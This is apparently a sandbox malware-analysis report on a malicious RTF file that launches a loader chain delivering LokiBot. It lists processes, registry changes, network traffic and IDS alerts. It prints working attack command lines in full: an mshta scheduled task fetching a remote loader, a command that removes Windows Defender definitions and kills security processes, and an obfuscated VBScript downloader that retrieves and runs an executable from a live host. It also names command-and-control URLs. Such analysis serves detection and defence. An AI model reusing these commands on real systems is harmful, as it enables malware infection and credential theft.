File name: | 0001.doc |
Full analysis: | https://app.any.run/tasks/45059934-0ced-4247-9a51-6ec0d8d6ca7d |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | January 23, 2019, 08:55:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, ANSI |
MD5: | 6D5EEF8F3DF1D7730F7FF22A4B13B23F |
SHA1: | 9452DB4D96BA98D72629AC1EB50E4FAE55F7F401 |
SHA256: | E3C786FEC0479F5AF52D7740E77479014C8863E5E9F0C639095595D999C2D80F |
SSDEEP: | 6144:kX0OPX0OVX0OiX0OXX0O0X0OrX0OxX0Oy:kv1C3ULRS |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3000 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0001.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 1 Version: 14.0.6024.1000 | ||||
3848 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 1 Version: 14.0.6024.1000 | ||||
2732 | mshta.exe https://methodsofcreation.blogspot.com/p/encryption2.html | C:\Windows\system32\mshta.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3240 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 20 /tn "MSOFFICE" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://tinytech997.blogspot.com/p/loader.html\",0,true)(window.close)" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3832 | "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im mshta.exe & taskkill /f /im MSASCuiL.exe & taskkill /f /im MpCmdRun.exe & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2444 | "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo AmmEiqWkls = "http://216.170.120.102/kates.exe">>UpdateWindow.vbs &@echo ZIMMER = L0u("NcN`aV[a;ReR")>>UpdateWindow.vbs &@echo Set ZIMMERing = CreateObject(L0u("Z`eZY?;eZYUaa]"))>>UpdateWindow.vbs &@echo ZIMMERing.Open L0u("TRa"), AmmEiqWkls, False>>UpdateWindow.vbs &@echo ZIMMERing.send ("")>>UpdateWindow.vbs &@echo Set FatherOFVidus = CreateObject(L0u("NQ\QO;`a_RNZ"))>>UpdateWindow.vbs &@echo FatherOFVidus.Open>>UpdateWindow.vbs &@echo FatherOFVidus.Type = 1 >>UpdateWindow.vbs &@echo FatherOFVidus.Write ZIMMERing.ResponseBody>>UpdateWindow.vbs & @echo FatherOFVidus.Position = 0 >>UpdateWindow.vbs &@echo FatherOFVidus.SaveToFile ZIMMER, 2 >>UpdateWindow.vbs &@echo FatherOFVidus.Close>>UpdateWindow.vbs &@echo function L0u(K4d) >> UpdateWindow.vbs &@echo For Dintannaa = 1 To Len(K4d) >>UpdateWindow.vbs &@echo BuEllWsWam = Mid(K4d, Dintannaa, 1) >>UpdateWindow.vbs &@echo BuEllWsWam = Chr(Asc(BuEllWsWam)- 13) >>UpdateWindow.vbs &@echo VuzEgEas = VuzEgEas + BuEllWsWam >> UpdateWindow.vbs &@echo Next >>UpdateWindow.vbs &@echo L0u = VuzEgEas >>UpdateWindow.vbs &@echo End Function >>UpdateWindow.vbs& UpdateWindow.vbs &dEl UpdateWindow.vbs & timeout 12 & AVASTINT.EXE | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2780 | MpCmdRun.exe -removedefinitions -dynamicsignatures | C:\Program Files\Windows Defender\MpCmdRun.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Malware Protection Command Line Utility Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2288 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4072 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\UpdateWindow.vbs" | C:\Windows\System32\WScript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3720 | taskkill /f /im excel.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | 0t% |
Value: 30742500B80B0000010000000000000000000000 | |||
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1312227358 | |||
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1312227472 | |||
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1312227473 | |||
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: B80B00008CEC2575F9B2D40100000000 | |||
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | 6u% |
Value: 36752500B80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | 6u% |
Value: 36752500B80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3000) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9810.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3848 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA29F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\plusone[1].js | text | |
MD5:E0D238A2B59C86393AB27378ABFA1131 | SHA256:0015A708B6D2F12384EE780A36BCB03B5DF66A7DAC9DA2BF0E162F976019492B | |||
2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\encryption2[1].html | html | |
MD5:D065EDDF1666A1F63D6B0AD5B128D31E | SHA256:5303DE0730DBEFC2AFB2C7BB4B7E13A24FF1EAA4BA3F4DC572AE303FF864F003 | |||
3000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$01.doc.rtf | pgc | |
MD5:92CCE27E4D73CDE631BC874B15878DA1 | SHA256:483774A3F4004D7DF86E34B1C2DC2867CB13AE585614B49B97F264DA4FF67546 | |||
2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\cb=gapi[1].loaded_1 | text | |
MD5:603EC60EFE600D441FC21C6FBCB3430B | SHA256:2F186A262082026CA95C58DC03685671EC56E5493056BFA4E8D8887E594DF96D | |||
2732 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txt | text | |
MD5:FA4D10F8E1819FDFAEA206C788B09BA7 | SHA256:0FA5A47702D28E2290FE98B30E934C645E85CB778FFBE2EBAC8CE2CE7AACCE91 | |||
3000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\99BA1CC.wmf | wmf | |
MD5:F805B2269DCC910D671B2B45FE6CB033 | SHA256:631983654C0F69751EB4AC2FD166981E1D7C1F895E1D8405D312092F310C0A3F | |||
2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\211300122-widgets[1].js | text | |
MD5:12926C0E6033D425F424771F4BBE3A7C | SHA256:4DC814BE3C423A930D46F18AD50F1F3DB9B57F4F657DC7ED7C9D1F825F7A9E89 | |||
2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1] | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4072 | WScript.exe | GET | 200 | 216.170.120.102:80 | http://216.170.120.102/kates.exe | US | executable | 1.17 Mb | suspicious |
3224 | AVASTINT.EXE | POST | — | 103.63.2.245:80 | http://slomiter45u.us/gert/starboy/fre.php | HK | — | — | malicious |
3224 | AVASTINT.EXE | POST | — | 103.63.2.245:80 | http://slomiter45u.us/gert/starboy/fre.php | HK | — | — | malicious |
3224 | AVASTINT.EXE | POST | — | 103.63.2.245:80 | http://slomiter45u.us/gert/starboy/fre.php | HK | — | — | malicious |
3224 | AVASTINT.EXE | POST | — | 103.63.2.245:80 | http://slomiter45u.us/gert/starboy/fre.php | HK | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2732 | mshta.exe | 172.217.22.65:443 | methodsofcreation.blogspot.com | Google Inc. | US | whitelisted |
2732 | mshta.exe | 216.58.210.2:443 | pagead2.googlesyndication.com | Google Inc. | US | whitelisted |
2732 | mshta.exe | 172.217.16.201:443 | www.blogger.com | Google Inc. | US | whitelisted |
2732 | mshta.exe | 172.217.22.14:443 | apis.google.com | Google Inc. | US | whitelisted |
4072 | WScript.exe | 216.170.120.102:80 | — | ColoCrossing | US | suspicious |
2732 | mshta.exe | 172.217.16.141:443 | accounts.google.com | Google Inc. | US | suspicious |
3224 | AVASTINT.EXE | 103.63.2.245:80 | slomiter45u.us | Guochao Group limited | HK | suspicious |
Domain | IP | Reputation |
---|---|---|
methodsofcreation.blogspot.com |
| whitelisted |
www.blogger.com |
| shared |
apis.google.com |
| whitelisted |
pagead2.googlesyndication.com |
| whitelisted |
resources.blogblog.com |
| whitelisted |
accounts.google.com |
| shared |
img1.blogblog.com |
| suspicious |
slomiter45u.us |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
4072 | WScript.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
4072 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
4072 | WScript.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4072 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
4072 | WScript.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
3224 | AVASTINT.EXE | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 4 |
3224 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN LokiBot User-Agent (Charon/Inferno) |
3224 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN LokiBot Checkin |
3224 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 |
3224 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 |